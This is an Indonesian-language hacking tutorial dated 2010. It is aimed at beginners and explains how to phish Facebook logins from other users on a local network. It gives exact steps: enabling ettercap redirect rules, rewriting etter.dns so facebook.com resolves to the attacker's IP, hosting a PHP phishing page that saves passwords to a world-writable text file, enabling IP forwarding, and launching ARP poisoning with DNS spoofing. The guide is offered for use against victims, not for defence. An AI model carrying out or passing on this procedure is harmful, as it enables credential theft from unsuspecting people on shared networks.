_ _ _ _ _ _ _ | |__ _ _ _ _ _ _ _ __| || | | | _| |__ | || | | '_ \| | | | | | | | | | | '__| || |_| |/ / '_ \| || |_ | |_) | |_| | | |_| | |_| | | |__ _| <| | | |__ _| |_.__/ \__, | \__, |\__,_|_| |_| |_|\_\_| |_| |_| |___/ |___/ ,.Indonesian Hakers., ======================================================================================================================================================== ------------------------------------------------------------------/ [~] Title : Implementasi Pishing Dengan Teknik DNS Spoffing [~] Date : 26-08-2010 [~] Author : yur4kh4 [~] Contact : yur4kh4[at]yahoo[d0t]com [~] Web : http://www.devirakhjib.co.cc/ [~] Language : Indonesian [~] Tested 0n : ubuntu 10.4 (lucid) ------------------------------------------------------------------/ [*] berpatah-patah Kata tulisan ini di khususkan untuk para newbie di kemas dengan sedikit bahasa 4la4y..ahahaha..namun tetap menjunjung tinggi ide0logi ketampanan...wekzz.,., mohon maav sy sampai kan di awal tulisan,,karena sy sadar sangat banyak sekali kekurangan dalam tulisan ini... kekurangan itu tidak lepas dari keterbatasan,,,ilmu pengetahuan sy,,..& kehendak yang maha kuasa.,.:p [@] Persiapan implementasi pishing dengan teknik DNS spoffing.. teknik lama namun masih cukup ampuh untuk mengelabui client-client yang ada satu jaringan dengan kita..:P yang perlu kita siapkan.. 1. apache server 2. php 3. ettercap 4. script pishing 5. mental yg kuat & sedang tidak dalam keadaan mabuk.akakakaka.,. sy anggap semua peralatan sudah di install.. cek apache2 yg di install tadi, ketik "localhost" pada web browser ente yang ganteng2.,.:D klo ada tulisan "its works" < tempat konfigurasinya ada di /etc/etter.conf yur4@localhost $ sudo gedit /etc/etter.conf maka akan membuka file etter.conf dengan menggunakan gedit.. selanjutnya cari #--------------- # Linux #--------------- # if you use ipchains: #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" hilangkan tanda pagarnya..sehingga menjadi sepert ini #--------------- # Linux #--------------- # if you use ipchains: redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" penghilangan tanda "#" sama dengan pembebasan/meng-aktivkan...script kalo sudah save...& jangan di ingat-ingat lagi...ahahahaa selanjutnya.. rubah file etter.dns yang terdapat di /usr/share/ettercap yur4@localhost $ gedit /usr/share/ettercap/etter.dns delete isi etter.dns defaultnya & ganti menjadi seperti ini ============================cut here============================= facebook.com A 10.10.10.6 *.facebook.com A 10.10.10.6 www.facebook.com PTR 10.10.10.6 # Wildcards in PTR are not allowed ============================cut here============================= sedikit penjelasan facebook.com = site yang akan kita pishing 10.10.10.6 = IP attacker NB: untuk melihat ip yur4@localhost $ ifconfig kemudian save... selanjutnya...copy file-file pishing kita k /var/www biasanya ada 3 file..index.php terserah.txt logs.php sebelumnya di hapus aja dulu index.html defaultnya y... beri perintah gini di file terserah.txt agar bisa di eksekusi.. root@localhost /var/www $ touch terserah.txt root@localhost /var/www $ chmod 777 terserah.txt wokeyy...saya anggap sudah di copy y... [@] eksekusi next...buka ettercap ente.. sekedar berbagi pengalaman sajjha..klo sy lebih suka membuka ettercap menggunakan mode console...:D yur4@localhost $ sudo ettercap -C=mode/ -i=intercafe -C bisa di ganti dengan -G=mode gui -T=mode text.. misal : yur4@localhost $ ettercap -C -i eth0 sy akan melakukan sniffing pada network card LAN (local area network) di sesuaikan sajjha dengan network card yg activ di leppy or PC ente.. next... pilih tab "sniff" >> unified sniffing >>pilih network card yg aktiv...[enter] selanjutnya pada tab "host">>scan host.... kemudia berangkat k tab "plugins">> manage the plugins aktivkan autoadd & dns_spoff selanjutnya pada tab "mitm" >>arp poisoning..[centang/enter] kemudia terakhir ke tab "start">>start sniffing...:) wew.,rumit dech kyx ych.,.hee...ngga' kq sebenarnya.,.klo dh biasa ga rumit kq..:p jangan senang dulu haruz ada 1 hal lagi di lakukan...:p yaitu meng-forward ip / berpura2 menjadi server lach.,.wekzz.,.. langsung sajjha...masuk ke terminal ketikan perintah ini.. yur4@localhost $ sudo nano /proc/sys/net/ipv4/ip_forward password : masukan password ente.. ganti angka 0 dengan angka 1 kemudian save....(ctrl+x >>y>>enter) [@] Penutup sippzzz...tinggal tunggu az dech....:p lakukan dengan teman anda agar bisa langsung melihat hasilnya...tp kalo ga percaya... silahkan buka facebook.com login dech.. seperti biasa password akan tersimpan di terserah.txt bisa lihat di http://localhost/terserah.txt tulisan ini sangat susah di mengerti...ahaha..sy yang nuliz az bingung aplgi kalian yang baca.,.:p klo memang seriuz...conntact saja sy..^_^..tanyakan semua yang belum jelas... & mudah-mudahan sy bisa jawab yach.,.amin.,.:p +++++++++++++++++++thankz t0++++++++++++++++++++++++ [&] allah, muhammad, & seluruh pengikutnya... [!] Malang Cyber Crew - kill-9 - Indonesian coder [%] Arianom, Tukulesto , marahmerah , kamtiez , vYc0d , xr0b0t contrex , mboys , Pathloader , rifky , Thunder x c0de, jundab ibl13z , geni212 , dhomas , kalong666 ,ichal ,tucker , &&**akulukasaatkaupergi**&& +++++++++++++++++++Luv der4+++++++++++++++++++++++++